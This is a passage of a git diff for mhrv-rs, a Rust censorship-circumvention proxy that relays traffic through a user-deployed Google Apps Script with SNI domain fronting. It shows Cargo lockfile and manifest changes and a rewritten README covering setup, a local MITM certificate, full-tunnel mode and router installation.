 checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa"
+
+[[package]]
+name = "zvariant"
+version = "3.15.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4eef2be88ba09b358d3b58aca6e41cd853631d44787f319a1383ca83424fb2db"
+dependencies = [
+ "byteorder",
+ "enumflags2",
+ "libc",
+ "serde",
+ "static_assertions",
+ "zvariant_derive",
+]
+
+[[package]]
+name = "zvariant_derive"
+version = "3.15.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "37c24dc0bed72f5f90d1f8bb5b07228cbf63b3c6e9f82d82559d4bae666e7ed9"
+dependencies = [
+ "proc-macro-crate 1.3.1",
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+ "zvariant_utils",
+]
+
+[[package]]
+name = "zvariant_utils"
+version = "1.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7234f0d811589db492d16893e3f21e8e2fd282e6d01b0cddee310322062cc200"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
diff --git a/Cargo.toml b/Cargo.toml
index e7fdae86..12b0aaad 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "mhrv-rs"
-version = "1.6.0"
+version = "1.9.25"
 edition = "2021"
 description = "Rust port of MasterHttpRelayVPN -- DPI bypass via Google Apps Script relay with domain fronting"
 license = "MIT"
@@ -71,6 +71,7 @@ eframe = { version = "0.28", default-features = false, features = [
     "glow",
     "wgpu",
     "persistence",
+    "accesskit",
 ], optional = true }
 url = "2.5.8"
 
@@ -94,11 +95,15 @@ libc = "0.2"
 # traffic black-holes (symptom: Chrome shows DNS_PROBE_STARTED).
 [target.'cfg(target_os = "android")'.dependencies]
 jni = { version = "0.21", default-features = false }
-tun2proxy = { version = "0.7", default-features = false }
+tun2proxy = { version = "0.7", default-features = false, features = ["udpgw"] }
 
 [dev-dependencies]
 # Used in mitm tests to sanity-check the cert extensions we emit.
 x509-parser = "0.16"
+# `test-util` enables `tokio::test(start_paused = true)` so timing-
+# sensitive tests in `tunnel_client` (the empty-poll cadence) can
+# auto-advance virtual time instead of burning real wall-clock seconds.
+tokio = { version = "1", features = ["test-util"] }
 
 [profile.release]
 panic = "abort"
diff --git a/README.md b/README.md
index 938d10c1..cd065e04 100644
--- a/README.md
+++ b/README.md
@@ -1,777 +1,352 @@
-# MasterHttpRelayVPN-RUST
+# mhrv-rs — bypass censorship for free, with your own Google account
 
-[![Latest release](https://img.shields.io/github/v/release/therealaleph/MasterHttpRelayVPN-RUST?sort=semver&display_name=tag&logo=github&label=release)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest)
-[![Downloads](https://img.shields.io/github/downloads/therealaleph/MasterHttpRelayVPN-RUST/total?label=downloads&logo=github)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases)
+[![Latest release](https://img.shields.io/github/v/release/therealaleph/MasterHttpRelayVPN-RUST?display_name=tag&logo=github&label=release&color=blue&cacheSeconds=300)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest)
+[![Downloads](https://img.shields.io/github/downloads/therealaleph/MasterHttpRelayVPN-RUST/total.svg?label=downloads&logo=github&cacheSeconds=300)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases)
 [![CI](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/actions/workflows/release.yml/badge.svg)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/actions/workflows/release.yml)
 [![License: MIT](https://img.shields.io/github/license/therealaleph/MasterHttpRelayVPN-RUST?color=blue)](LICENSE)
 [![Stars](https://img.shields.io/github/stars/therealaleph/MasterHttpRelayVPN-RUST?style=flat&logo=github)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/stargazers)
 [![Support](https://img.shields.io/badge/❤️_Support-sh1n.org-red?style=flat)](https://sh1n.org/donate)
 
-Rust port of [@masterking32's MasterHttpRelayVPN](https://github.com/masterking32/MasterHttpRelayVPN). **All credit for the original idea and the Python implementation goes to [@masterking32](https://github.com/masterking32).** This is a faithful reimplementation of the `apps_script` mode, packaged as two tiny binaries (CLI + desktop UI) with no runtime dependencies.
+**A small program that runs on your computer and lets you visit blocked websites for free, using a Google Apps Script you deploy in your own free Google account. Your ISP only sees encrypted traffic to `www.google.com` — it can't tell what you're really visiting.**
 
-Free DPI bypass via Google Apps Script as a remote relay, with TLS SNI concealment. Your ISP's censor sees traffic going to `www.google.com`; behind the scenes a free Google Apps Script that you deploy in your own Google account fetches the real website for you.
+🇬🇧 [English Quick Start](#quick-start) · [Full Guide (advanced topics)](docs/guide.md)
+🇮🇷 [راه‌اندازی سریع فارسی](#راه‌اندازی-سریع) · [راهنمای کامل (مباحث پیشرفته)](docs/guide.fa.md)
 
-> **Heads up on authorship:** the bulk of this Rust port was written with [Anthropic's Claude](https://claude.com) driving, reviewed by a human on every commit. Bug reports, fixes, and contributions are all welcome — see the [issues page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues).
+<p align="center" dir="rtl">
+  ۱. <a href="https://www.youtube.com/watch?v=voCwxgvWR5U" target="_blank" rel="noopener noreferrer">راهنمای تصویری راه اندازی به زبان فارسی</a> (YouTube)
+  <br>
+  ۲. <a href="https://kian-irani.github.io/mhrv-setup-full-tunell/" target="_blank" rel="noopener noreferrer">راهنمای جامع متنی راه اندازی به زبان فارسی</a> با تشکر از <a href="https://github.com/KIAN-IRANi" target="_blank" rel="noopener noreferrer">Kian Irani</a>
+</p>
 
-**[Quick Start (English)](SF_README.md#quick-start)** | **[English Guide](#setup-guide)** | **[راهنمای خلاصه فارسی](SF_README.md#راهنمای-خلاصه-فارسی)** | **[راهنمای کامل فارسی](#راهنمای-فارسی)**
-
-> **New here?** The Quick Start versions are short, plain-language, and cover the most common questions. The full guides have everything else (config options, full tunnel mode, OpenWRT, security notes).
+---
 
-## Why this exists
+## What you get
 
-The original Python project is excellent but requires Python + `pip install cryptography h2` + system deps. For users in hostile networks that install process is often itself broken (blocked PyPI, missing wheels, Windows without Python). This port is a single ~2.5 MB executable that you download and run. Nothing else.
+- 🌐 **Bypasses DPI / SNI blocking** by using Google's edge as a relay
+- 💯 **Completely free** — runs on your own Google account's free tier
+- ⚡ **One small file** (~3 MB), no Python, no Node.js, no dependencies
+- 🖥️ **Works on** Mac, Windows, Linux, Android, OpenWRT routers
+- 🦊 **Any browser or app** that supports HTTP proxy or SOCKS5
 
-## How it works
+## How it works (the simple picture)
 
 ```
-Browser / Telegram / xray
-        |
-        | HTTP proxy (8085)  or  SOCKS5 (8086)
-        v
-mhrv-rs (local)
-        |
-        | TLS to Google IP, SNI = www.google.com
-        v                       ^
-   DPI sees www.google.com      |
-        |                       | Host: script.google.com (inside TLS)
-        v                       |
-  Google edge frontend ---------+
-        |
-        v
-  Apps Script relay (your free Google account)
-        |
-        v
-  Real destination
+   you  →  browser  →  mhrv-rs  ──┐
+                                  │ ISP only sees:  www.google.com
+                                  ▼
+                          Google's network
+                                  │
+                                  ▼
+              your free Apps Script  fetches  the real site
+                                  │
+                                  ▼
+                Twitter / ChatGPT / blocked-site of your choice
 ```
 
-The censor's DPI sees `www.google.com` in the TLS SNI and lets it through. Google's frontend hosts both `www.google.com` and `script.google.com` on the same IP and routes by the HTTP `Host` header inside the encrypted stream.
-
-For a handful of Google-owned domains (`google.com`, `youtube.com`, `fonts.googleapis.com`, …) the same tunnel is used directly instead of going through the Apps Script relay. This bypasses the per-fetch quota and fixes the "User-Agent is always `Google-Apps-Script`" problem for those domains. You can add more domains via the `hosts` map in config.
-
-## Platforms
-
-Linux (x86_64, aarch64), macOS (x86_64, aarch64), Windows (x86_64), **Android 7.0+** (universal APK covering arm64, armv7, x86_64, x86). Prebuilt binaries on the [releases page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases).
-
-**Android users** — grab `mhrv-rs-android-universal-v*.apk` and follow the full walk-through in [docs/android.md](docs/android.md) (English) or [docs/android.fa.md](docs/android.fa.md) (فارسی). The Android build runs the exact same `mhrv-rs` crate as the desktop (via JNI) and adds a TUN bridge via `tun2proxy`, so every app on the device routes its IP traffic through the proxy without per-app configuration.
-
-> **Important Android caveat (issues #74 / #81):** while TUN captures all IP traffic, _HTTPS_ traffic from third-party apps still only works for apps that trust user-installed CAs. From Android 7 onward (which covers all supported devices — `minSdk = 24`), apps must opt in via `networkSecurityConfig` to trust the MITM CA we install. **Chrome and Firefox do**; **Telegram, WhatsApp, Instagram, YouTube, banking apps, games** do not. For those apps, either use `PROXY_ONLY` mode and point their in-app proxy at `127.0.0.1:1081` (SOCKS5), use `google_only` mode (no CA required, Google services only), or set `upstream_socks5` to an external VPS. This is an Android security design, not a bug in this client — same limit applies to every other MITM proxy on the platform.
-
-## What's in a release
-
-Each archive contains two binaries and a launcher script:
-
-| file | purpose |
-|---|---|
-| `mhrv-rs` / `mhrv-rs.exe` | CLI. Headless use, servers, automation. Works on all platforms; no system deps on macOS/Windows. |
-| `mhrv-rs-ui` / `mhrv-rs-ui.exe` | Desktop UI (egui). Config form, Start/Stop/Test buttons, live stats, log panel. |
-| `run.sh` / `run.command` / `run.bat` | Platform launcher: installs the MITM CA (needs sudo/admin) and then starts the UI. Use this on first run. |
-
-macOS archives also ship `mhrv-rs.app` (in `*-app.zip`) — double-click to launch the UI without a terminal. You'll still need to run the CLI (`mhrv-rs --install-cert`) or `run.command` once to install the CA.
-
-<p align="center"><img src="docs/ui-screenshot.png" alt="mhrv-rs desktop UI showing config form, live traffic stats, Start/Stop/Test buttons, and log panel" width="420"></p>
-
-Linux UI also needs common desktop libraries available: `libxkbcommon`, `libwayland-client`, `libxcb`, `libgl`, `libx11`, `libgtk-3`. On most desktop distros these are already present; on a headless box install them via your package manager, or just use the CLI.
-
-## Where things live
-
-Config and the MITM CA live in the OS user-data dir:
-
-- macOS: `~/Library/Application Support/mhrv-rs/`
-- Linux: `~/.config/mhrv-rs/`
-- Windows: `%APPDATA%\mhrv-rs\`
-
-Inside that dir:
-
-- `config.json` — your settings (written by the UI's **Save** button or hand-edited)
-- `ca/ca.crt`, `ca/ca.key` — the MITM root certificate. Only you have the private key.
+ISPs can't read inside encrypted HTTPS. They only see the address — `www.google.com`. The actual page lookup happens inside Google's network, hidden in the encrypted tunnel.
 
-The CLI also falls back to `./config.json` in the current directory for backward compatibility with older setups.
+## Quick Start
 
-## Setup Guide
+**About 5 minutes.** You need:
 
-### Step 1 — Deploy the Apps Script relay (one-time)
+- A free Google account (any Gmail works)
+- A computer (Mac, Windows, or Linux)
+- Firefox or Chrome
 
-This part is unchanged from the original project. Follow @masterking32's guide or the summary below:
+### Step 1 — Make the Google Apps Script (one-time)
 
-1. Open <https://script.google.com> while signed into your Google account.
-2. **New project**, delete the default code.
-3. Copy the contents of [`Code.gs` from the original repo](https://github.com/masterking32/MasterHttpRelayVPN/blob/python_testing/apps_script/Code.gs) ([raw](https://raw.githubusercontent.com/masterking32/MasterHttpRelayVPN/refs/heads/python_testing/apps_script/Code.gs)) into the editor. If that URL is unreachable from your network, there's a mirrored copy in this repo at [`assets/apps_script/Code.gs`](assets/apps_script/Code.gs) — same file, pulled from upstream.
-4. Change `const AUTH_KEY = "..."` to a strong secret only you know.
-5. **Deploy → New deployment → Web app**.
-   - Execute as: **Me**
-   - Who has access: **Anyone**
-6. Copy the **Deployment ID** (the long random string in the URL).
-
-#### Can't reach `script.google.com` from your network?
-
-If your ISP is already blocking Google Apps Script (or all of Google), you need Step 1's browser connection to succeed *before* you have a relay to use. `mhrv-rs` ships a small bootstrap mode for exactly this: `google_only`.
-
-1. Build / download the binary as in Step 2 below.
-2. Copy [`config.google-only.example.json`](config.google-only.example.json) to `config.json` — no `script_id`, no `auth_key` required.
-3. Run `mhrv-rs serve` and set your browser's HTTP proxy to `127.0.0.1:8085`.
-4. In `google_only` mode the proxy only relays `*.google.com`, `*.youtube.com`, and the other Google-edge hosts via the same SNI-rewrite tunnel the full client uses. Other traffic goes direct — no Apps Script relay exists yet.
-5. Do Step 1 in your browser (the connection to `script.google.com` will be SNI-fronted). Deploy Code.gs, copy the Deployment ID.
-6. In the desktop UI or the Android app (or by editing `config.json`) switch the mode back to `apps_script`, paste the Deployment ID and your auth key, and restart.
-
-You can also verify reachability before even starting the proxy: `mhrv-rs test-sni` probes `*.google.com` directly and works without any config beyond `google_ip` + `front_domain`.
-
-### Step 2 — Download
-
-Grab the archive for your platform from the [releases page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases) and extract it.
-
-Or build from source:
-
-```bash
-cargo build --release --features ui
-# Binaries: target/release/mhrv-rs and target/release/mhrv-rs-ui
-```
-
-### Step 3 — First run: install the MITM CA
-
-To route your browser's HTTPS traffic through the Apps Script relay, `mhrv-rs` has to terminate TLS locally on your machine, forward the request through the relay, and re-encrypt the response with a certificate your browser trusts. That requires a small **local** Certificate Authority.
+1. Go to **[script.google.com](https://script.google.com)** and sign in with your Google account
+2. Click **New project** at the top left
+3. Delete the default code in the editor
+4. Open the file [`assets/apps_script/Code.gs`](assets/apps_script/Code.gs) in this repo, copy all of it, paste into the Apps Script editor (replacing what was there)
+5. Find this line near the top:
+   ```js
+   const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+   ```
+   Change `CHANGE_ME_TO_A_STRONG_SECRET` to a long random string of your own. **Keep this string** — you'll paste it into the app in Step 3. Treat it like a password.
+6. Click 💾 **Save** (or `Ctrl/Cmd+S`)
+7. Click **Deploy** (top right) → **New deployment**
+8. Click the gear icon ⚙ next to "Select type" → choose **Web app**
+9. Set:
+   - **Execute as:** *Me* (your Google account)
+   - **Who has access:** *Anyone*
+10. Click **Deploy**. Google may ask for permissions — click **Authorize access** and approve
+11. Google shows a **Deployment ID** (a long random string). **Copy it** — you'll need it in Step 3.
 
-**What actually happens on first run:**
+> **Tip:** if you ever update `Code.gs` later, don't make a new deployment. Edit the code, then go to **Deploy → Manage deployments → ✏️ → Version: New version → Deploy**. The Deployment ID stays the same.
 
-- A fresh CA keypair (`ca/ca.crt` + `ca/ca.key`) is generated **on your machine**, in your user-data dir.
-- The public `ca.crt` is added to your system trust store so browsers accept the per-site certificates `mhrv-rs` mints on the fly. This is the step that needs sudo / Administrator.
-- The private `ca.key` **never leaves your machine**. Nothing uploads it, nothing phones home, and no remote party — including the Apps Script relay — can use it to impersonate sites to you.
-- You can revoke it at any time by deleting the CA from your OS keychain (macOS: Keychain Access → System → delete `mhrv-rs`) / Windows cert store / `/etc/ca-certificates`, and removing the `ca/` folder.
+### Step 2 — Download mhrv-rs
 
-The launcher does all of this for you and then starts the UI:
+Go to the [latest release page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) and download the file for your computer:
 
-| platform | how |
+| You're on | Download this |
 |---|---|
-| macOS | double-click `run.command` in Finder (or `./run.command` in a terminal) |
-| Linux | `./run.sh` from a terminal |
-| Windows | double-click `run.bat` |
-
-It will ask for your password (sudo / UAC) **only** to trust the CA. After that the launcher also starts `mhrv-rs-ui`. On later runs you don't need the launcher — the CA is already trusted, so you can open `mhrv-rs.app` / `mhrv-rs-ui.exe` / `mhrv-rs-ui` directly.
-
-If you prefer to do the CA step by hand:
-
-```bash
-# Linux / macOS
-sudo ./mhrv-rs --install-cert
-
-# Windows (Administrator)
-mhrv-rs.exe --install-cert
-```
-
-Firefox keeps its own cert store; the installer also drops the CA into Firefox's NSS database via `certutil` (best-effort). If Firefox still complains, import `ca/ca.crt` manually via Settings → Privacy & Security → Certificates → View Certificates → Authorities → Import.
+| Mac with Apple Silicon (M1 / M2 / M3 / M4 chip) | `mhrv-rs-macos-arm64-app.zip` |
+| Mac with Intel chip | `mhrv-rs-macos-amd64-app.zip` |
+| Windows | `mhrv-rs-windows-amd64.zip` |
+| Linux (Ubuntu / Mint / Fedora / Debian / Arch) | `mhrv-rs-linux-amd64.tar.gz` |
+| Android phone or tablet | `mhrv-rs-android-universal-v*.apk` |
+| OpenWRT router or Alpine | `mhrv-rs-linux-musl-amd64.tar.gz` |
 
-### Step 4 — Configure in the UI
+> **Mac: not sure if Apple Silicon or Intel?** Click the Apple menu (top-left corner of the screen) → **About This Mac**. If "Chip" says **Apple**, get arm64. If **Intel**, get amd64.
 
-Open the UI and fill in the form:
+> **Linux: getting a `GLIBC` error?** Use the `linux-musl-amd64` file instead — it works on any Linux without dependencies.
 
-- **Apps Script ID** — the Deployment ID from Step 1. Add multiple IDs (one per line in the UI, or a JSON array in `config.json`) for higher quota **and** lower latency. In `apps_script` mode, IDs are round-robined. In `full` mode, each deployment gets its own pool of 30 concurrent requests (the Apps Script per-account limit), so more IDs = more total throughput (see [Full tunnel mode](#full-tunnel-mode) below).
-- **Auth key** — the same secret you set in `Code.gs`.
-- **Google IP** — `216.239.38.120` is a solid default. Use the **scan** button to probe for a faster one from your network.
-- **Front domain** — keep `www.google.com`.
-- **HTTP port** / **SOCKS5 port** — defaults `8085` / `8086`.
+Unzip it.
 
-Hit **Save**, then **Start**. Use **Test** any time to send one request end-to-end through the relay and report the result.
+### Step 3 — First run
 
-### Step 4 (alternative) — CLI only
+Double-click the launcher:
 
-Everything the UI does is also available in the CLI. Copy `config.example.json` to `config.json` (either next to the binary or into the user-data dir shown above), fill it in:
+- **Mac:** `run.command`
+- **Windows:** `run.bat`
+- **Linux:** `./run.sh` (in a terminal)
 
-```json
-{
-  "mode": "apps_script",
-  "google_ip": "216.239.38.120",
-  "front_domain": "www.google.com",
-  "script_id": "PASTE_YOUR_DEPLOYMENT_ID_HERE",
-  "auth_key": "same-secret-as-in-code-gs",
-  "listen_host": "127.0.0.1",
-  "listen_port": 8085,
-  "socks5_port": 8086,
-  "log_level": "info",
-  "verify_ssl": true
-}
-```
-
-Then:
-
-```bash
-./mhrv-rs                   # serve (default)
-./mhrv-rs test              # one-shot end-to-end probe
-./mhrv-rs scan-ips          # rank Google frontend IPs by latency
-./mhrv-rs --install-cert    # reinstall the MITM CA
-./mhrv-rs --help
-```
-
-`script_id` can also be a JSON array: `["id1", "id2", "id3"]`.
-
-#### scan-ips configuration (optional)
-
-By default, the scan-ips subcommand uses a static array of IPs.
-
-You can enable dynamic IP discovery by setting fetch_ips_from_api to true in config.json:
-
-```json
-{
-  "fetch_ips_from_api": true,
-  "max_ips_to_scan": 100,
-  "scan_batch_size":100,
-  "google_ip_validation": true // check whether ips belongs to frontend sites of google or not
-}
-```
-
-When enabled:
-
-- Fetches goog.json from Google’s public IP ranges API
-- Extracts all CIDRs and expands them to individual IPs
-- Prioritizes IPs from famous Google domains (google.com, youtube.com, etc.)
-- Randomly selects up to max_ips_to_scan candidates (prioritized IPs first)
-- Tests only the selected candidates for connectivity and frontend validation.
-
-By using this options you may find ips witch are faster than static array that is provided as default but there is no guarantee that this ips would work.
-
-
-### Step 5 — Point your client at the proxy
-
-The tool listens on **two** ports. Use whichever your client supports:
-
-**HTTP proxy** (browsers, generic HTTP clients) — `127.0.0.1:8085`
-
-- **Firefox** — Settings → Network Settings → **Manual proxy**. HTTP host `127.0.0.1`, port `8085`, tick **Also use this proxy for HTTPS**.
-- **Chrome / Edge** — use the system proxy settings, or the **Proxy SwitchyOmega** extension.
-- **macOS system-wide** — System Settings → Network → Wi-Fi → Details → Proxies → enable **Web Proxy (HTTP)** and **Secure Web Proxy (HTTPS)**, both `127.0.0.1:8085`.
-- **Windows system-wide** — Settings → Network & Internet → Proxy → **Manual proxy setup**, address `127.0.0.1`, port `8085`.
-
-**SOCKS5 proxy** (Telegram, xray, app-level clients) — `127.0.0.1:8086`, no auth.
+The first time, it asks for your computer password. This is to install one small certificate so your browser trusts mhrv-rs. **The certificate is generated on your computer and never leaves it** — no cloud, no Google, nothing remote can use it.
 
-- Works for HTTP, HTTPS, **and** non-HTTP protocols (Telegram's MTProto, raw TCP). The server auto-detects each connection: HTTP/HTTPS go through the Apps Script relay, SNI-rewritable domains go through the direct Google-edge tunnel, and anything else falls through to raw TCP.
+The mhrv-rs window opens. Fill in:
 
-## Telegram, IMAP, SSH — pair with xray (optional)
-
-The Apps Script relay only speaks HTTP request/response, so non-HTTP protocols (Telegram MTProto, IMAP, SSH, arbitrary raw TCP) can't travel through it. Without anything else, those flows hit the direct-TCP fallback — which means they're not actually tunneled, and an ISP that blocks Telegram will still block them.
-
-Fix: run a local [xray](https://github.com/XTLS/Xray-core) (or v2ray / sing-box) with a VLESS/Trojan/Shadowsocks outbound that goes to a VPS of your own, and point mhrv-rs at xray's SOCKS5 inbound via the **Upstream SOCKS5** field (or the `upstream_socks5` config key). When set, raw-TCP flows coming through mhrv-rs's SOCKS5 listener get chained into xray → the real tunnel, instead of connecting directly.
-
-```
-Telegram  ┐                                                    ┌─ Apps Script ── HTTP/HTTPS
-          ├─ SOCKS5 :8086 ─┤ mhrv-rs ├─ SNI rewrite ─── google.com, youtube.com, …
-Browser   ┘                                                    └─ upstream SOCKS5 ─ xray ── VLESS ── your VPS   (Telegram, IMAP, SSH, raw TCP)
-```
-
-Example config fragment (both UI and JSON):
-
-```json
-{
-  "upstream_socks5": "127.0.0.1:50529"
-}
-```
-
-HTTP/HTTPS continues to route through the Apps Script relay (no change), and the SNI-rewrite tunnel for `google.com` / `youtube.com` / etc. keeps bypassing both — so YouTube stays as fast as before while Telegram gets a real tunnel.
-
-## Full tunnel mode
-
-Full tunnel mode (`"mode": "full"`) routes **all** traffic end-to-end through Apps Script and a remote [tunnel-node](tunnel-node/) — no MITM certificate needed. TCP is carried as persistent tunnel sessions, and UDP from Android/TUN clients is carried via SOCKS5 `UDP ASSOCIATE` to the tunnel-node, which then emits real UDP from the server side. The trade-off is higher latency per request (every byte/datagram goes Apps Script → tunnel-node → destination), but it works for protocols and apps that cannot use the MITM relay path.
-
-### How deployment IDs affect performance
-
-Each Apps Script batch request takes ~2 seconds round-trip. In full mode, `mhrv-rs` runs a **pipelined batch multiplexer** that fires multiple batch requests concurrently without waiting for the previous one to return. Each deployment ID (= one Google account) gets its own concurrency pool of **30 in-flight requests** — matching the Apps Script per-account execution limit.
-
-```
-max_concurrent = 30 × number_of_deployment_ids
-```
-
-| Deployments | Concurrent requests | Notes |
-|-------------|-------------------|-------|
-| 1 | 30 | Single account — plenty for light browsing |
-| 3 | 90 | Good for daily use |
-| 6 | 180 | Recommended for heavy use |
-| 12 | 360 | Multi-account power setup |
-
-More deployments = more total concurrency = lower per-session latency. Each batch round-robins across your deployment IDs, so the load is spread evenly and you're less likely to hit a single deployment's quota ceiling.
-
-**Resource guards** keep things safe:
-- **50 ops max** per batch — if more sessions are active, the mux splits into multiple batches
-- **4 MB payload cap** per batch — well under Apps Script's 50 MB limit
-- **30 s timeout** per batch — a slow/dead target can't block other sessions forever
-
-### Quick start
-
-1. Deploy [`CodeFull.gs`](assets/apps_script/CodeFull.gs) as a **Web App deployment** on each Google account (same steps as `Code.gs`, but use the full-mode script that forwards to your tunnel-node). Use **one deployment per Google account** — the 30-concurrent-request limit is per account, so multiple deployments on the same account share the same pool and don't add concurrency. To scale, add more accounts:
-   - **Solo use** → 1–2 accounts is plenty
-   - **Shared with ~3 people** → 3 accounts
-   - **Shared with a group** → one account per heavy user
-2. Deploy the [tunnel-node](tunnel-node/) on a VPS. The fastest path is the prebuilt Docker image:
-   ```bash
-   docker run -d --name mhrv-tunnel --restart unless-stopped \
-     -p 8080:8080 -e TUNNEL_AUTH_KEY=your-strong-secret \
-     ghcr.io/therealaleph/mhrv-tunnel-node:latest
-   ```
-   Multi-arch (linux/amd64 + linux/arm64), runs as a non-root user, ~32 MB compressed. Pin a version tag (`:1.5.0`) for production. See [tunnel-node/README.md](tunnel-node/README.md) for Cloud Run, docker-compose, and source-build alternatives.
-3. Set `"mode": "full"` in your config with all deployment IDs:
-
-```json
-{
-  "mode": "full",
-  "script_id": ["id1", "id2", "id3", "id4", "id5", "id6"],
-  "auth_key": "your-secret"
-}
-```
+- **Apps Script ID(s)** → paste the **Deployment ID** from Step 1
+- **Auth key** → paste the random string you put in `Code.gs`
+- Leave everything else at the defaults
 
-## Running on OpenWRT (or any musl distro)
+Click **Save config**, then **Start**. The status circle goes green if it works.
 
-The `*-linux-musl-*` archives ship a fully static CLI that runs on OpenWRT, Alpine, and any libc-less Linux userland. Put the binary on the router and start it as a service:
+> **Test it:** click the **Test** button. It sends one request through the relay and tells you if it worked.
 
-```sh
-# From a machine that can reach your router:
-scp mhrv-rs root@192.168.1.1:/usr/bin/mhrv-rs
-scp mhrv-rs.init root@192.168.1.1:/etc/init.d/mhrv-rs
-scp config.json root@192.168.1.1:/etc/mhrv-rs/config.json
+### Step 4 — Tell your browser to use mhrv-rs
 
-# On the router:
-chmod +x /usr/bin/mhrv-rs /etc/init.d/mhrv-rs
-/etc/init.d/mhrv-rs enable
-/etc/init.d/mhrv-rs start
-logread -e mhrv-rs -f   # tail its logs
-```
+#### Firefox (recommended — easiest)
 
-LAN devices then point their HTTP proxy at the router's LAN IP (default port `8085`) or their SOCKS5 at `<router-ip>:8086`. Set `listen_host` to `0.0.0.0` in `/etc/mhrv-rs/config.json` so the router accepts LAN connections instead of localhost-only.
+1. Firefox → ☰ menu → **Settings**
+2. Search "proxy" in the search box
+3. Click **Settings…** under Network Settings
+4. Choose **Manual proxy configuration**
+5. **HTTP Proxy:** `127.0.0.1` Port: `8085`
+6. ☑ Check **"Also use this proxy for HTTPS"**
+7. Click **OK**
 
-Memory footprint is ~15-20 MB resident — fine on anything with ≥128 MB RAM. No UI is shipped for musl (routers are headless).
+#### Chrome / Edge
 
-## Diagnostics
+Install the [Proxy SwitchyOmega](https://chromewebstore.google.com/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif) extension and set proxy to `127.0.0.1:8085`.
 
-- **`mhrv-rs test`** — sends one request through the relay and reports success/latency. Use this first whenever something breaks — it isolates "relay is up" from "client config is wrong".
-- **`mhrv-rs scan-ips`** — parallel TLS probe of 28 known Google frontend IPs, sorted by latency. Take the winner and put it in `google_ip`. The UI has the same thing behind the **scan** button next to the Google IP field.
-- **`mhrv-rs test-sni`** — parallel TLS probe of every SNI name in your rotation pool against the configured `google_ip`. Tells you which front-domain names actually pass through your ISP's DPI. The UI has the same thing in the **SNI pool…** floating window, with checkboxes, per-row **Test** buttons, and a **Keep ✓ only** button that auto-trims to what worked.
-- **Periodic stats** are logged every 60 s at `info` level (relay calls, cache hit rate, bytes relayed, active vs. blacklisted scripts). The UI shows them live.
+#### macOS (whole system)
 
-### SNI pool editor
+System Settings → Network → Wi-Fi → Details → **Proxies** → enable both **Web Proxy (HTTP)** and **Secure Web Proxy (HTTPS)**, both pointing to `127.0.0.1:8085`.
 
-By default `mhrv-rs` rotates through `{www, mail, drive, docs, calendar}.google.com` on outbound TLS connections to your Google IP, to avoid fingerprinting one name too heavily. Some of those may be locally blocked — e.g. `mail.google.com` has been specifically targeted in Iran at various times.
+### Step 5 — Try it
 
-Either:
+Open any blocked site in your browser. It should load.
 
-- Open the UI, click **SNI pool…**, hit **Test all**, then **Keep ✓ only** to auto-trim. Add custom names via the text field at the bottom. Save.
-- Or edit `config.json` directly:
+If something doesn't work:
 
-```json
-{
-  "sni_hosts": ["www.google.com", "drive.google.com", "docs.google.com"]
-}
-```
+- Click **Test** in the mhrv-rs window — it pinpoints which step is failing
+- Look at the **Recent log** panel at the bottom of the window
+- See [Common questions](#common-questions) below
 
-Leaving `sni_hosts` unset gives you the default auto-pool. Run `mhrv-rs test-sni` to verify what works from your network before saving.
+---
 
-## What's implemented vs. not
+## Common questions
 
-This port focuses on the **`apps_script` mode** — the only one that reliably works against a modern censor in 2026. Implemented:
+**Is this really free?** Yes. Google gives every account 20,000 outbound URL fetches per day on the free tier. That's plenty for one person's normal browsing. For a family of 3–4 sharing the same setup, make 2–3 deployments in different Google accounts and add all the IDs.
 
-- [x] Local HTTP proxy (CONNECT for HTTPS, plain forwarding for HTTP)
-- [x] Local SOCKS5 proxy with smart TLS/HTTP/raw-TCP dispatch (Telegram, xray, etc.)
-- [x] MITM with on-the-fly per-domain cert generation via `rcgen`
-- [x] CA generation + auto-install on macOS / Linux / Windows
-- [x] Firefox NSS cert install (best-effort via `certutil`)
-- [x] Apps Script JSON relay, protocol-compatible with `Code.gs`
-- [x] Connection pooling (45 s TTL, max 20 idle)
-- [x] Gzip response decoding
-- [x] Multi-script round-robin
-- [x] Auto-blacklist failing scripts on 429 / quota errors (10-minute cooldown)
-- [x] Response cache (50 MB, FIFO + TTL, `Cache-Control: max-age` aware, heuristics for static assets)
-- [x] Request coalescing: concurrent identical GETs share one upstream fetch
-- [x] SNI-rewrite tunnels (direct to Google edge, bypassing the relay) for `google.com`, `youtube.com`, `youtu.be`, `youtube-nocookie.com`, `fonts.googleapis.com`. Extra domains configurable via the `hosts` map.
-- [x] Automatic redirect handling on the relay (`/exec` → `googleusercontent.com`)
-- [x] Header filtering (strip connection-specific, brotli)
-- [x] `test` and `scan-ips` subcommands
-- [x] Script IDs masked in logs (`prefix…suffix`) so `info` logs don't leak deployment IDs
-- [x] Desktop UI (egui) — cross-platform, no bundler needed
-- [x] Optional upstream SOCKS5 chaining for non-HTTP traffic (Telegram MTProto, IMAP, SSH…) so raw-TCP flows can be tunneled through xray / v2ray / sing-box instead of connecting directly. HTTP/HTTPS keeps going through the Apps Script relay.
-- [x] Connection pool pre-warm on startup (first request skips the TLS handshake to Google edge).
-- [x] Per-connection SNI rotation across a pool of Google subdomains (`www/mail/drive/docs/calendar.google.com`), so outbound connection counts aren't concentrated on one SNI.
-- [x] Optional parallel script-ID dispatch (`parallel_relay`): fan out a relay request to N script instances concurrently, return first success, kill p95 latency at the cost of N× quota.
